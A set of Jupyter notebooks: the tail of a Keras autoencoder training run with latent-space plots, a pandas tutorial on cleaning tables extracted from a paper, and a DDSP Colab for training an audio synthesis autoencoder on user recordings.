- ETA: 0s - loss: 0.1140 Epoch 00017: val_loss did not improve from 0.11381 235/235 [==============================] - 1s 6ms/step - loss: 0.1140 - val_loss: 0.1139 Epoch 18/100 233/235 [============================>.] - ETA: 0s - loss: 0.1133 Epoch 00018: val_loss improved from 0.11381 to 0.11224, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1133 - val_loss: 0.1122 Epoch 19/100 234/235 [============================>.] - ETA: 0s - loss: 0.1127 Epoch 00019: val_loss improved from 0.11224 to 0.11138, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1127 - val_loss: 0.1114 Epoch 20/100 227/235 [===========================>..] - ETA: 0s - loss: 0.1122 Epoch 00020: val_loss improved from 0.11138 to 0.11081, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1122 - val_loss: 0.1108 Epoch 21/100 226/235 [===========================>..] - ETA: 0s - loss: 0.1118 Epoch 00021: val_loss improved from 0.11081 to 0.11079, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1118 - val_loss: 0.1108 Epoch 22/100 234/235 [============================>.] - ETA: 0s - loss: 0.1113 Epoch 00022: val_loss improved from 0.11079 to 0.11058, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1113 - val_loss: 0.1106 Epoch 23/100 232/235 [============================>.] - ETA: 0s - loss: 0.1109 Epoch 00023: val_loss improved from 0.11058 to 0.11040, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1109 - val_loss: 0.1104 Epoch 24/100 229/235 [============================>.] - ETA: 0s - loss: 0.1105 Epoch 00024: val_loss improved from 0.11040 to 0.10948, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1105 - val_loss: 0.1095 Epoch 25/100 230/235 [============================>.] - ETA: 0s - loss: 0.1101 Epoch 00025: val_loss did not improve from 0.10948 235/235 [==============================] - 1s 6ms/step - loss: 0.1101 - val_loss: 0.1119 Epoch 26/100 234/235 [============================>.] - ETA: 0s - loss: 0.1098 Epoch 00026: val_loss did not improve from 0.10948 235/235 [==============================] - 1s 6ms/step - loss: 0.1098 - val_loss: 0.1105 Epoch 27/100 227/235 [===========================>..] - ETA: 0s - loss: 0.1094 Epoch 00027: val_loss improved from 0.10948 to 0.10876, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1094 - val_loss: 0.1088 Epoch 28/100 226/235 [===========================>..] - ETA: 0s - loss: 0.1091 Epoch 00028: val_loss did not improve from 0.10876 235/235 [==============================] - 1s 6ms/step - loss: 0.1091 - val_loss: 0.1093 Epoch 29/100 235/235 [==============================] - ETA: 0s - loss: 0.1088 Epoch 00029: val_loss improved from 0.10876 to 0.10870, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1088 - val_loss: 0.1087 Epoch 30/100 231/235 [============================>.] - ETA: 0s - loss: 0.1085 Epoch 00030: val_loss improved from 0.10870 to 0.10839, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1085 - val_loss: 0.1084 Epoch 31/100 228/235 [============================>.] 
- ETA: 0s - loss: 0.1082 Epoch 00031: val_loss did not improve from 0.10839 235/235 [==============================] - 1s 6ms/step - loss: 0.1082 - val_loss: 0.1098 Epoch 32/100 232/235 [============================>.] - ETA: 0s - loss: 0.1079 Epoch 00032: val_loss did not improve from 0.10839 235/235 [==============================] - 1s 6ms/step - loss: 0.1079 - val_loss: 0.1084 Epoch 33/100 229/235 [============================>.] - ETA: 0s - loss: 0.1076 Epoch 00033: val_loss improved from 0.10839 to 0.10712, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1077 - val_loss: 0.1071 ###Markdown Sample and Display Images ###Code images, labels = next(iter(ds_test)) autoencoder.model = load_model(model_path) outputs = autoencoder.model.predict(images) # Display grid_col = 10 grid_row = 2 f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col*1.1, grid_row)) i = 0 for row in range(0, grid_row, 2): for col in range(grid_col): axarr[row,col].imshow(images[i,:,:,0], cmap='gray') axarr[row,col].axis('off') axarr[row+1,col].imshow(outputs[i,:,:,0], cmap='gray') axarr[row+1,col].axis('off') i += 1 f.tight_layout(0.1, h_pad=0.2, w_pad=0.1) plt.show() ###Output _____no_output_____ ###Markdown Set z_dim = 2 and to look at the latent variables ###Code autoencoder_2 = Autoencoder(z_dim=2) early = EarlyStopping(monitor= "val_loss", mode= "auto", patience = 5) callbacks_list = [early] autoencoder_2.model.compile( loss = "bce", optimizer=tf.keras.optimizers.RMSprop(learning_rate=1e-3)) autoencoder_2.model.fit(ds_train, validation_data=ds_test, epochs = 50, callbacks = callbacks_list) images, labels = next(iter(ds_test_label)) outputs = autoencoder_2.encoder.predict(images) plt.figure(figsize=(8,8)) plt.scatter(outputs[:,0], outputs[:,1], c=labels, cmap='RdYlBu', s=3) plt.colorbar() z_samples = np.array([[z1, z2] for z2 in np.arange(-5, 5, 1.) for z1 in np.arange(-5, 5, 1.)]) images = autoencoder_2.decoder.predict(z_samples) grid_col = 10 grid_row = 10 f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col, grid_row)) i = 0 for row in range(grid_row): for col in range(grid_col): axarr[row,col].imshow(images[i,:,:,0], cmap='gray') axarr[row,col].axis('off') i += 1 f.tight_layout(0.1, h_pad=0.2, w_pad=0.1) plt.show() import ipywidgets as widgets from ipywidgets import interact, interact_manual @interact def explore_latent_variable(z1 = (-5,5,0.1), z2 = (-5,5,0.1)): z_samples = [[z1, z2]] images = autoencoder_2.decoder.predict(z_samples) plt.figure(figsize=(2,2)) plt.imshow(images[0,:,:,0], cmap='gray') ###Output _____no_output_____
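###Markdown
Since z_dim=2 gives a smooth latent plane, interpolating between the codes of two real digits is a nice extra sanity check. A short sketch using the trained encoder and decoder from above.
###Code
# Sketch: decode a straight-line walk between two latent codes
test_imgs, _ = next(iter(ds_test))
z = autoencoder_2.encoder.predict(test_imgs[:2])      # codes of two test digits

alphas = np.linspace(0.0, 1.0, 10)
z_path = np.array([(1 - a) * z[0] + a * z[1] for a in alphas])
decoded = autoencoder_2.decoder.predict(z_path)

f, axarr = plt.subplots(1, 10, figsize=(10, 1))
for i in range(10):
    axarr[i].imshow(decoded[i, :, :, 0], cmap='gray')
    axarr[i].axis('off')
plt.show()
###Output
_____no_output_____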
book/2-pandas-datacleaning.ipynb
###Markdown
Data Cleaning with Pandas
======================

Overview

Questions

What does 'clean data' mean?
How can I drop unnecessary data from my dataframe?
How can I change column or row names in a dataframe?
How can I cast columns to the correct data type?

Objectives:

Use pandas to drop unnecessary data from our dataframe.
Learn how to rename pandas columns.
Use pandas string methods to correct characters.
Learn how to cast columns to the correct data type.

Keypoints:

Data cleaning prepares data for analysis.
Pandas has built-in methods for handling data cleaning, particularly missing data.

In this section, we'll read in the data we extracted in the last lesson. You may have noticed in the last session that the data in these dataframes didn't look great. There were columns that appeared to have no values. Once we start working with the data, we are going to see some additional problems.
###Code
import os
import pandas as pd

fpath = os.path.join("data", "potts_table1.csv")
fpath2 = os.path.join("data", "potts_table2.csv")

table1 = pd.read_csv(fpath)
table2 = pd.read_csv(fpath2)

table1.head()
###Output
_____no_output_____
###Markdown
Dropping unnecessary data

In some cases, we might have data in our dataframe that we don't need. We will want to discard or "drop" this data from the dataframe. For the dataframe we just loaded, for example, we can see that the data in columns 0, 1, 4, 12 appear to not have any values.

Check your understanding: What pandas method can you use to see how many non-null values you have in each column?

````{admonition} Solution
:class: dropdown
```python
table1.info()
```
````

There are two methods you might use to drop data from a dataframe. These are `drop` and `dropna`. `drop` is used when you have specific rows or columns you want to remove from the dataframe, while `dropna` is used when you want to drop columns or rows which contain `NaN` or "not a number" values. This occurs when there are no values in a data cell.

In the output of `info` above, we can see that there are two columns which contain 0 non-null values. This means that all of the values in these columns are `NaN`. We can safely discard these columns. We'll use the `dropna` function to get rid of them.
###Code
help(table1.dropna)
###Output
Help on method dropna in module pandas.core.frame:

dropna(axis=0, how='any', thresh=None, subset=None, inplace=False) method of pandas.core.frame.DataFrame instance
    Remove missing values.

    See the :ref:`User Guide <missing_data>` for more on which values are
    considered missing, and how to work with missing data.

    Parameters
    ----------
    axis : {0 or 'index', 1 or 'columns'}, default 0
        Determine if rows or columns which contain missing values are
        removed.

        * 0, or 'index' : Drop rows which contain missing values.
        * 1, or 'columns' : Drop columns which contain missing value.

        .. versionchanged:: 1.0.0

           Pass tuple or list to drop on multiple axes.
           Only a single axis is allowed.

    how : {'any', 'all'}, default 'any'
        Determine if row or column is removed from DataFrame, when we have
        at least one NA or all NA.

        * 'any' : If any NA values are present, drop that row or column.
        * 'all' : If all values are NA, drop that row or column.

    thresh : int, optional
        Require that many non-NA values.
    subset : array-like, optional
        Labels along other axis to consider, e.g. if you are dropping rows
        these would be a list of columns to include.
    inplace : bool, default False
        If True, do operation inplace and return None.
    Returns
    -------
    DataFrame or None
        DataFrame with NA entries dropped from it or None if ``inplace=True``.

    See Also
    --------
    DataFrame.isna: Indicate missing values.
    DataFrame.notna : Indicate existing (non-missing) values.
    DataFrame.fillna : Replace missing values.
    Series.dropna : Drop missing values.
    Index.dropna : Drop missing indices.

    Examples
    --------
    >>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'],
    ...                    "toy": [np.nan, 'Batmobile', 'Bullwhip'],
    ...                    "born": [pd.NaT, pd.Timestamp("1940-04-25"),
    ...                             pd.NaT]})
    >>> df
           name        toy       born
    0    Alfred        NaN        NaT
    1    Batman  Batmobile 1940-04-25
    2  Catwoman   Bullwhip        NaT

    Drop the rows where at least one element is missing.

    >>> df.dropna()
         name        toy       born
    1  Batman  Batmobile 1940-04-25

    Drop the columns where at least one element is missing.

    >>> df.dropna(axis='columns')
           name
    0    Alfred
    1    Batman
    2  Catwoman

    Drop the rows where all elements are missing.

    >>> df.dropna(how='all')
           name        toy       born
    0    Alfred        NaN        NaT
    1    Batman  Batmobile 1940-04-25
    2  Catwoman   Bullwhip        NaT

    Keep only the rows with at least 2 non-NA values.

    >>> df.dropna(thresh=2)
           name        toy       born
    1    Batman  Batmobile 1940-04-25
    2  Catwoman   Bullwhip        NaT

    Define in which columns to look for missing values.

    >>> df.dropna(subset=['name', 'toy'])
           name        toy       born
    1    Batman  Batmobile 1940-04-25
    2  Catwoman   Bullwhip        NaT

    Keep the DataFrame with valid entries in the same variable.

    >>> df.dropna(inplace=True)
    >>> df
         name        toy       born
    1  Batman  Batmobile 1940-04-25
###Markdown
Before saving the dataframe, we'll look at and discuss the output from this function. By default, the function `dropna` will work on `axis 0`, or the rows of the dataframe, and will drop any row which contains a `NaN`. You will see this results in a dataframe with no data.
###Code
table1.dropna()
###Output
_____no_output_____
###Markdown
Notice that `dropna` returns a dataframe and does not overwrite the original.
###Code
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 14 columns):
 #   Column        Non-Null Count  Dtype
---  ------        --------------  -----
 0   Unnamed: 0    37 non-null     int64
 1   Unnamed: 0.1  1 non-null      object
 2   Compound      37 non-null     object
 3   log P         37 non-null     object
 4   Unnamed: 1    0 non-null      float64
 5   II            37 non-null     float64
 6   Hy            37 non-null     float64
 7   H,            37 non-null     float64
 8   MV            37 non-null     object
 9   R,            37 non-null     float64
 10  log Kou       37 non-null     object
 11  log Kyex      31 non-null     object
 12  Unnamed: 2    0 non-null     float64
 13  log Kpep      25 non-null     object
dtypes: float64(6), int64(1), object(7)
memory usage: 4.2+ KB
###Markdown
We can switch to dropping columns which have `NaN` values by adding the argument `axis=1`.
###Code
table1.dropna(axis=1).info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 9 columns):
 #   Column      Non-Null Count  Dtype
---  ------      --------------  -----
 0   Unnamed: 0  37 non-null     int64
 1   Compound    37 non-null     object
 2   log P       37 non-null     object
 3   II          37 non-null     float64
 4   Hy          37 non-null     float64
 5   H,          37 non-null     float64
 6   MV          37 non-null     object
 7   R,          37 non-null     float64
 8   log Kou     37 non-null     object
dtypes: float64(4), int64(1), object(4)
memory usage: 2.7+ KB
###Markdown
This is closer to what we want. However, you'll notice that this has dropped some columns which have data. By default, pandas will drop a column which contains **any** `NaN` values.
This may not be what we want in many cases because some values may simply be missing rather than incorrect.We can add an additional argument, `how=all`, to drop only columns whose values are **all** `NaN`. By default, this function argument is `how=any`. Once we are sure we would like to keep this as our dataframe, we can add `inplace=True` to the function call to overwrite the dataframe. ###Code table1.dropna(axis=1, how="all") ###Output _____no_output_____ ###Markdown The output above looks like something to keep, so we will add `inplace=True` to overwrite the original dataframe. ###Code table1.dropna(axis=1, how="all", inplace=True) table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 12 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Unnamed: 0 37 non-null int64 1 Unnamed: 0.1 1 non-null object 2 Compound 37 non-null object 3 log P 37 non-null object 4 II 37 non-null float64 5 Hy 37 non-null float64 6 H, 37 non-null float64 7 MV 37 non-null object 8 R, 37 non-null float64 9 log Kou 37 non-null object 10 log Kyex 31 non-null object 11 log Kpep 25 non-null object dtypes: float64(4), int64(1), object(7) memory usage: 3.6+ KB ###Markdown We can drop the final two columns using the `drop` function. You can use this when you have specific rows or columns you would like to discard. Again, we use `axis=1` to drop columns, then we pass the column name. ###Code table1.drop(axis=1, columns=["Unnamed: 0.1", "Unnamed: 0"], inplace=True) ###Output _____no_output_____ ###Markdown Changing column namesOur column names are still incorrect. You will likely want to change them to make the table more legible. ###Code table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 10 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Compound 37 non-null object 1 log P 37 non-null object 2 II 37 non-null float64 3 Hy 37 non-null float64 4 H, 37 non-null float64 5 MV 37 non-null object 6 R, 37 non-null float64 7 log Kou 37 non-null object 8 log Kyex 31 non-null object 9 log Kpep 25 non-null object dtypes: float64(4), object(6) memory usage: 3.0+ KB ###Markdown We might now want to clean up the column names and make sure they are descriptive. You can see the column names using `table1.columns`. You can either rename the columns by setting `table1.columns` to a list of the appropriate length, or you can use `table1.rename`. In the `.rename` method, you put the argument `columns` and set it equal to a dictionary (curly brackets) where you use the syntax```python"current_column_name": "new_column_name"``` ###Code table1.columns table1.rename(inplace=True, columns={ "II": "pi", "Hy": "Hd", "H,": "Ha", "R,": "R_2", "log Kou": "log K_oct", "log Kyex": "log K_hex", "log Kpep": "log K_hep" }) table1.head() ###Output _____no_output_____ ###Markdown Fixing Data Types When examining `.info` , you'll notice that a lot of our columns which should be numbers are still 'objects' or strings. We would like `log P`, for example to be numeric. Typically if a column appears that it should be numeric, but pandas does not automatically cast it as such, it is because there are some non-numeric characters in the column which pandas could not decide what to do with. We will need to examine these, decide what to do with them, then cast the column as numeric.There are a few ways to do this, but we'll use the pandas function `to_numeric`. 
###Code
table1.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 37 entries, 0 to 36
Data columns (total 10 columns):
 #   Column     Non-Null Count  Dtype
---  ------     --------------  -----
 0   Compound   37 non-null     object
 1   log P      37 non-null     object
 2   pi         37 non-null     float64
 3   Hd         37 non-null     float64
 4   Ha         37 non-null     float64
 5   MV         37 non-null     object
 6   R_2        37 non-null     float64
 7   log K_oct  37 non-null     object
 8   log K_hex  31 non-null     object
 9   log K_hep  25 non-null     object
dtypes: float64(4), object(6)
memory usage: 3.0+ KB
###Markdown
Using the `to_numeric` function without any additional inputs will fail on this data set.
###Code
pd.to_numeric(table1["log P"])
###Output
_____no_output_____
###Markdown
Scrolling to the bottom of this message and reading the error, you will see it is having a problem reading the value `"— 6.85"`. It may not seem obvious what this problem is at first. When we run into a problem like this we have a few options. You could choose to handle the errors differently. Pandas will let you set what you would like for it to do when it is unable to cast a value. By default, it will fail (which is what we see above). For example, you could also set errors to be ignored (which would result in the column being unchanged, there would just be no error raised) or to "coerce" the values. Choosing "coerce" means that anything that can't be cast as numeric will be put as `NaN`.

Let's see what happens when we set errors to coerce.
###Code
pd.to_numeric(table1["log P"], errors="coerce")
###Output
_____no_output_____
###Markdown
This unfortunately results in no numeric characters being recognized.

We have to do a little bit more processing to the values for this to work. If you examine the columns, you may notice that the negative sign is a little off. It is `—` when it should be `-`. This is very slight, and might be hard to see, but it is important to change for this data set.

We will want to replace all `—` with `-`. We could accomplish this using the string method `replace`. Strings in Python have a number of methods. The `replace` method allows us to replace a substring within a string.
###Code
test_string = "Hello world."
test_string.replace(".", "!")
###Output
_____no_output_____
###Markdown
The split command is another string method you are probably familiar with:
###Code
test_string.split()
###Output
_____no_output_____
###Markdown
Pandas string methods

If we want to use these on a column in a pandas dataframe, you might think to use `apply`, which we learned about in the last session. However, you will notice that the `replace` method acts on the string itself and doesn't fit into `apply`.

Luckily, when pandas columns are strings, we can use string methods on the whole column by adding `.str.function`.
For example, to replace the minus signs ###Code table1["log P"].str.replace("—", "-") table1["log P"] = table1["log P"].str.replace("—", "-") # We still need to get rid of spaces table1["log P"] = table1["log P"].str.replace(" ", "") table1["log P"] = pd.to_numeric(table1["log P"], errors="coerce") table1.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 37 entries, 0 to 36 Data columns (total 10 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 Compound 37 non-null object 1 log P 34 non-null float64 2 pi 37 non-null float64 3 Hd 37 non-null float64 4 Ha 37 non-null float64 5 MV 37 non-null object 6 R_2 37 non-null float64 7 log K_oct 37 non-null object 8 log K_hex 31 non-null object 9 log K_hep 25 non-null object dtypes: float64(5), object(5) memory usage: 3.0+ KB ###Markdown We actually need to change this character on all of our columns. However `str` methods only work on pandas series. If we want to replace a string across all of our DataFrame, we will use the `.replace` method. In order for it to recognize substrings, set the option `regex=True`. We will discuss `regex` more in the next session, but this is all you need to know about regex for the moment. ###Code table1.replace("—", "-", regex=True, inplace=True) table1.replace(" ", "", regex=True, inplace=True) ###Output _____no_output_____ ###Markdown Changing the data type of multiple columns To change the data type of multiple columns, we will want to use the `pd.to_numeric` function on all of those columns. There are several ways you might choose to do this. For example, you might just choose to call the function for each column.We can also accomplish this by using the `apply` operator which we learned about in the last session. The `apply` operator should be used whenever you want to apply a function to a row or column. In this case, we want to apply the `pd.to_numeric` function to each column.Because we want to apply to the columns, we add the argument `axis=1`. ###Code table1.apply(pd.to_numeric, axis=1) ###Output _____no_output_____ ###Markdown When we try this code, we immediately see an error. We do not want to try to convert the first column to a number. We can use the `iloc` function to exclude the first column: ###Code table1.iloc[:, 1:].apply(pd.to_numeric, axis=1) ###Output _____no_output_____ ###Markdown An error again! This time, we see failure because a string was incorrectly read from the pdf and could not be converted to a number. You could choose to handle this differently, but for this workshop we are just going to discard values like these. If we were using `to_numeric` on a pandas series, we would use the option `errors="coerce"`. You may not see immediately how to use this with the `apply` function, but fortunately, pandas allows us to pass additional arguments with `apply`: ###Code table1.iloc[:, 1:] = table1.iloc[:, 1:].apply(pd.to_numeric, axis=1, errors="coerce") table1.info() table1.to_csv("data/potts_table1_clean.csv", index=False) ###Output _____no_output_____
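###Markdown
As a recap, the whole cleaning workflow can be collected into a single function, which is handy if `table2` needs the same treatment. This is a sketch that assumes the same raw layout as `table1`; `clean_table` and `rename_map` are illustrative names, and the renames are specific to each table, so they are passed in as an argument.
###Code
def clean_table(fpath, rename_map):
    """Read a raw extracted CSV and apply the cleaning steps from this lesson."""
    df = pd.read_csv(fpath)
    df.dropna(axis=1, how="all", inplace=True)  # drop columns that are entirely NaN
    df.drop(columns=[c for c in df.columns if c.startswith("Unnamed")], inplace=True)
    df.rename(columns=rename_map, inplace=True)
    df = df.replace("—", "-", regex=True).replace(" ", "", regex=True)  # fix minus signs and stray spaces
    df.iloc[:, 1:] = df.iloc[:, 1:].apply(pd.to_numeric, errors="coerce")
    return df
###Output
_____no_output_____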
ddsp/colab/demos/.ipynb_checkpoints/train_autoencoder-checkpoint.ipynb
###Markdown
Copyright 2020 Google LLC.

Licensed under the Apache License, Version 2.0 (the "License");
###Code
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
###Output
_____no_output_____
###Markdown
Train a DDSP Autoencoder on GPU

This notebook demonstrates how to install the DDSP library and train it for synthesis based on your own data using our command-line scripts. If run inside of Colab, it will automatically use a free Google Cloud GPU.

At the end, you'll have a custom-trained checkpoint that you can download to use with the [DDSP Timbre Transfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb).

**Note that we prefix bash commands with a `!` inside of Colab, but you would leave them out if running directly in a terminal.**

Install Dependencies

First we install the required dependencies with `pip`.
###Code
%tensorflow_version 2.x
!pip install -qU ddsp[data_preparation]

# Initialize global path for using google drive.
DRIVE_DIR = ''
###Output
_____no_output_____
###Markdown
Setup Google Drive (Optional, Recommended)

This notebook requires uploading audio and saving checkpoints. While you can do this with direct uploads / downloads, it is recommended to connect to your google drive account. This will enable faster file transfer, and regular saving of checkpoints so that you do not lose your work if the colab kernel restarts (common for training more than 12 hours).

Login and mount your drive

This will require an authentication code. You should then be able to see your drive in the file browser on the left panel.
###Code
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Set your base directory

* In drive, put all of the audio (.wav, .mp3) files with which you would like to train in a single folder.
  * Typically works well with 10-20 minutes of audio from a single monophonic source (also, one acoustic environment).
* Use the file browser in the left panel to find a folder with your audio, right-click **"Copy Path", paste below**, and run the cell.
###Code
#@markdown (ex. `/content/drive/My Drive/...`) Leave blank to skip loading from Drive.
DRIVE_DIR = '' #@param {type: "string"}

import os
assert os.path.exists(DRIVE_DIR)
print('Drive Folder Exists:', DRIVE_DIR)
###Output
_____no_output_____
###Markdown
Make directories to save model and data
###Code
AUDIO_DIR = 'data/audio'
AUDIO_FILEPATTERN = AUDIO_DIR + '/*'
!mkdir -p $AUDIO_DIR

if DRIVE_DIR:
  SAVE_DIR = os.path.join(DRIVE_DIR, 'ddsp-solo-instrument')
else:
  SAVE_DIR = '/content/models/ddsp-solo-instrument'
!mkdir -p "$SAVE_DIR"
###Output
_____no_output_____
###Markdown
Prepare Dataset

Upload training audio

Upload audio files to use for training your model. Uses `DRIVE_DIR` if connected to drive, otherwise prompts local upload.
###Code import glob import os from ddsp.colab import colab_utils if DRIVE_DIR: mp3_files = glob.glob(os.path.join(DRIVE_DIR, '*.mp3')) wav_files = glob.glob(os.path.join(DRIVE_DIR, '*.wav')) audio_files = mp3_files + wav_files else: audio_files, _ = colab_utils.upload() for fname in audio_files: target_name = os.path.join(AUDIO_DIR, os.path.basename(fname).replace(' ', '_')) print('Copying {} to {}'.format(fname, target_name)) !cp "$fname" $target_name ###Output _____no_output_____ ###Markdown Preprocess raw audio into TFRecord datasetWe need to do some preprocessing on the raw audio you uploaded to get it into the correct format for training. This involves turning the full audio into short (4-second) examples, inferring the fundamental frequency (or "pitch") with [CREPE](http://github.com/marl/crepe), and computing the loudness. These features will then be stored in a sharded [TFRecord](https://www.tensorflow.org/tutorials/load_data/tfrecord) file for easier loading. Depending on the amount of input audio, this process usually takes a few minutes.* (Optional) Transfer dataset from drive. If you've already created a dataset, from a previous run, this cell will skip the dataset creation step and copy the dataset from `$DRIVE_DIR/data` ###Code import glob import os TRAIN_TFRECORD = 'data/train.tfrecord' TRAIN_TFRECORD_FILEPATTERN = TRAIN_TFRECORD + '*' # Copy dataset from drive if dataset has already been created. drive_data_dir = os.path.join(DRIVE_DIR, 'data') drive_dataset_files = glob.glob(drive_data_dir + '/*') if DRIVE_DIR and len(drive_dataset_files) > 0: !cp "$drive_data_dir"/* data/ else: # Make a new dataset. if not glob.glob(AUDIO_FILEPATTERN): raise ValueError('No audio files found. Please use the previous cell to ' 'upload.') !ddsp_prepare_tfrecord \ --input_audio_filepatterns=$AUDIO_FILEPATTERN \ --output_tfrecord_path=$TRAIN_TFRECORD \ --num_shards=10 \ --alsologtostderr # Copy dataset to drive for safe-keeping. if DRIVE_DIR: !mkdir "$drive_data_dir"/ print('Saving to {}'.format(drive_data_dir)) !cp $TRAIN_TFRECORD_FILEPATTERN "$drive_data_dir"/ ###Output _____no_output_____ ###Markdown Save dataset statistics for timbre transferQuantile normalization helps match loudness of timbre transfer inputs to the loudness of the dataset, so let's calculate it here and save in a pickle file. ###Code from ddsp.colab import colab_utils import ddsp.training data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN) dataset = data_provider.get_dataset(shuffle=False) PICKLE_FILE_PATH = os.path.join(SAVE_DIR, 'dataset_statistics.pkl') colab_utils.save_dataset_statistics(data_provider, PICKLE_FILE_PATH) ###Output _____no_output_____ ###Markdown Let's load the dataset in the `ddsp` library and have a look at one of the examples. ###Code from ddsp.colab import colab_utils import ddsp.training from matplotlib import pyplot as plt import numpy as np data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN) dataset = data_provider.get_dataset(shuffle=False) try: ex = next(iter(dataset)) except StopIteration: raise ValueError( 'TFRecord contains no examples. 
Please try re-running the pipeline with '
        'different audio file(s).')

colab_utils.specplot(ex['audio'])
colab_utils.play(ex['audio'])

f, ax = plt.subplots(3, 1, figsize=(14, 4))
x = np.linspace(0, 4.0, 1000)
ax[0].set_ylabel('loudness_db')
ax[0].plot(x, ex['loudness_db'])
ax[1].set_ylabel('F0_Hz')
ax[1].set_xlabel('seconds')
ax[1].plot(x, ex['f0_hz'])
ax[2].set_ylabel('F0_confidence')
ax[2].set_xlabel('seconds')
ax[2].plot(x, ex['f0_confidence'])
###Output
_____no_output_____
###Markdown
Train Model

We will now train a "solo instrument" model. This means the model is conditioned only on the fundamental frequency (f0) and loudness with no instrument ID or latent timbre feature. If you uploaded audio of multiple instruments, the neural network you train will attempt to model all timbres, but will likely associate certain timbres with different f0 and loudness conditions.

First, let's start up a [TensorBoard](https://www.tensorflow.org/tensorboard) to monitor our loss as training proceeds. Initially, TensorBoard will report `No dashboards are active for the current data set.`, but once training begins, the dashboards should appear.
###Code
%reload_ext tensorboard
import tensorboard as tb
tb.notebook.start('--logdir "{}"'.format(SAVE_DIR))
###Output
_____no_output_____
###Markdown
We will now begin training.

Note that we specify [gin configuration](https://github.com/google/gin-config) files for both the model architecture ([solo_instrument.gin](TODO)) and the dataset ([tfrecord.gin](TODO)), which are both predefined in the library. You could also create your own. We then override some of the specific params for `batch_size` (which is defined in the model gin file) and the tfrecord path (which is defined in the dataset file).

Training Notes:

* Models typically perform well when the loss drops to the range of ~4.5-5.0.
* Depending on the dataset this can take anywhere from 5k-30k training steps usually.
* The default is set to 30k, but you can stop training at any time, and for timbre transfer, it's best to stop before the loss drops too far below ~5.0 to avoid overfitting.
* On the colab GPU, this can take from around 3-20 hours.
* We **highly recommend** saving checkpoints directly to your drive account as colab will restart naturally after about 12 hours and you may lose all of your checkpoints.
* By default, checkpoints will be saved every 300 steps with a maximum of 10 checkpoints (at ~60MB/checkpoint this is ~600MB). Feel free to adjust these numbers depending on the frequency of saves you would like and space on your drive.
* If you're restarting a session and `DRIVE_DIR` points to a directory that was previously used for training, training should resume at the last checkpoint.
###Code
!ddsp_run \
  --mode=train \
  --alsologtostderr \
  --save_dir="$SAVE_DIR" \
  --gin_file=models/solo_instrument.gin \
  --gin_file=datasets/tfrecord.gin \
  --gin_param="TFRecordProvider.file_pattern='$TRAIN_TFRECORD_FILEPATTERN'" \
  --gin_param="batch_size=16" \
  --gin_param="train_util.train.num_steps=30000" \
  --gin_param="train_util.train.steps_per_save=300" \
  --gin_param="trainers.Trainer.checkpoints_to_keep=10"
###Output
_____no_output_____
###Markdown
Resynthesis

Check how well the model reconstructs the training data
###Code
from ddsp.colab.colab_utils import play, specplot
import ddsp.training
import gin
from matplotlib import pyplot as plt
import numpy as np

data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN)
dataset = data_provider.get_batch(batch_size=1, shuffle=False)

try:
  batch = next(iter(dataset))
except StopIteration:
  # next() on an exhausted Python iterator raises StopIteration, matching the earlier cell.
  raise ValueError(
      'TFRecord contains no examples. Please try re-running the pipeline with '
      'different audio file(s).')

# Parse the gin config.
gin_file = os.path.join(SAVE_DIR, 'operative_config-0.gin')
gin.parse_config_file(gin_file)

# Load model
model = ddsp.training.models.Autoencoder()
model.restore(SAVE_DIR)

# Resynthesize audio.
audio_gen = model(batch, training=False)
audio = batch['audio']

print('Original Audio')
specplot(audio)
play(audio)

print('Resynthesis')
specplot(audio_gen)
play(audio_gen)
###Output
_____no_output_____
###Markdown
Download Checkpoint

Below you can download the final checkpoint. You are now ready to use it in the [DDSP Timbre Transfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb).
###Code
from ddsp.colab import colab_utils
import tensorflow as tf
import os

CHECKPOINT_ZIP = 'my_solo_instrument.zip'
latest_checkpoint_fname = os.path.basename(tf.train.latest_checkpoint(SAVE_DIR))
!cd "$SAVE_DIR" && zip $CHECKPOINT_ZIP $latest_checkpoint_fname* operative_config-0.gin dataset_statistics.pkl
